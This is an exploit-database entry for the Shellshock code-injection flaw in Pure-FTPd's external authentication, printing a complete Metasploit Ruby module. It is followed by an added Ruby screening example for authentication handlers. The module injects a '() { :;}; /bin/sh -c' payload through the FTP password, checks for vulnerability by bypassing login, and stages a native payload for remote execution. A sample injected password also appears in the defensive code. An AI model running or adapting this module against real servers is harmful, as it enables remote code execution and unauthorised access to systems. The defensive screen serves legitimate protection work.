Vendor: Pure-FTPd
By: Stephane Chazelas, Frank Denis, Spencer McIntyre
CVSS: 9.8 (CRITICAL)
CWE: 94 (Code Injection)
Product Name: Pure-FTPd
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: YES
Related CWE: CVE-2014-6271
CPE: Not available
Metasploit:
https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3093/
https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-2380-1/
https://www.rapid7.com/db/vulnerabilities/freebsd-vid-512d1301-49b9-11e4-ae2c-c80aa9043978/
https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3094/
https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3092/
https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/
https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/
https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6277/
https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6277/
https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6277/
https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-6277/
https://www.rapid7.com/db/vulnerabilities/apple-osx-afpserver-cve-2014-6277/
https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6277/
https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2
https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=3
https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=4
Other Scripts:
Platforms Tested: Linux
2014

Pure-FTPd External Authentication Bash Environment Variable Code Injection

This module exploits the code injection flaw known as Shellshock, which leverages specially crafted environment variables in Bash. The exploit specifically targets Pure-FTPd when it is configured to use an external program for authentication.

Mitigation:

Patch is available

Exploit-DB raw data:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
      'Description'     => %q(
        This module exploits the code injection flaw known as shellshock which
        leverages specially crafted environment variables in Bash. This exploit
        specifically targets Pure-FTPd when configured to use an external
        program for authentication.
      ),
      'Author'          =>
        [
          'Stephane Chazelas', # Vulnerability discovery
          'Frank Denis', # Discovery of Pure-FTPd attack vector
          'Spencer McIntyre' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2014-6271'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
        ],
      'Payload'         =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'         =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => :printf
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => :printf
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependFork' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 24 2014'))
    register_options(
      [
        Opt::RPORT(21),
        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
      ], self.class)
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def check
    # this check method tries to use the vulnerability to bypass the login
    username = rand_text_alphanumeric(rand(20) + 1)
    random_id = (rand(100) + 1)
    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
    if send_command(username, command) =~ /^2\d\d ok./i
      return CheckCode::Safe if banner !~ /pure-ftpd/i
      disconnect

      command = "echo auth_ok:0; echo end"
      if send_command(username, command) =~ /^5\d\d login authentication failed/i
        return CheckCode::Vulnerable
      end
    end
    disconnect

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
    username = rand_text_alphanumeric(rand(20) + 1)
    send_command(username, cmd)
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an ELF,
    # so check for a native payload before proceeding
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

    execute_cmdstager(linemax: 500)
    handler
  end

  def send_command(username, cmd)
    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
    connect
    send_user(username)
    password_result = send_pass(cmd)
    disconnect
    password_result
  end
end
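
Added example (not part of the module or of Pure-FTPd): screening logic for an external authentication handler, rejecting a login whose account or password carries the "() {" function-definition prefix that send_command places in the FTP password. AUTHD_ACCOUNT and AUTHD_PASSWORD are the variables pure-authd exports to the handler; the function names, the verifier callable and the sample values are assumptions made for illustration.

```ruby
# Added example: screening logic for a pure-authd external handler.
# Function and constant names are hypothetical, not Pure-FTPd code.

# Unpatched bash imports an environment value that begins with "() {" as a
# function definition; the pattern also tolerates extra whitespace.
FUNC_DEF_PREFIX = /\A\s*\(\s*\)\s*\{/

# Client-controlled variables pure-authd exports to the handler.
CLIENT_VARS = %w[AUTHD_ACCOUNT AUTHD_PASSWORD].freeze

DENY = "auth_ok:0\nend\n"

def function_definition?(value)
  FUNC_DEF_PREFIX.match?(value.to_s)
end

# Names of client-controlled variables carrying a function-definition prefix.
def suspicious_vars(env)
  CLIENT_VARS.select { |name| function_definition?(env[name]) }
end

# Environment that is safe to hand to a child process: every value that
# looks like a function definition is dropped, whatever its name.
def child_env(env)
  env.reject { |_name, value| function_definition?(value) }
end

# Builds the reply in the auth_ok/uid/gid/dir/end format. `verifier` is a
# callable (assumption) returning {uid:, gid:, dir:} or nil.
def authd_reply(env, verifier)
  return DENY unless suspicious_vars(env).empty?
  account = verifier.call(env['AUTHD_ACCOUNT'].to_s, env['AUTHD_PASSWORD'].to_s)
  return DENY unless account
  "auth_ok:1\nuid:#{account[:uid]}\ngid:#{account[:gid]}\ndir:#{account[:dir]}\nend\n"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: the password shape this module sends in send_command.
  sample = { 'AUTHD_ACCOUNT' => 'x1', 'PATH' => '/bin',
             'AUTHD_PASSWORD' => '() { :;}; /bin/sh -c "echo end"' }
  p suspicious_vars(sample)    # names that triggered the screen
  p child_env(sample).keys     # what a child process may inherit
  print authd_reply(sample, ->(_user, _pass) { nil })
end
```

The screen is defence in depth for a handler that is not itself a bash script; it does not replace the bash patch, and a legitimate password that begins with "() {" is rejected as well.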